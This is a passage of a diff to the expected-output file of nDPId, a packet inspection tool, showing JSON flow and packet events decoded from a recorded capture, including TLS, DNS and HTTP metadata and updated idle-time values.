{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} +01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 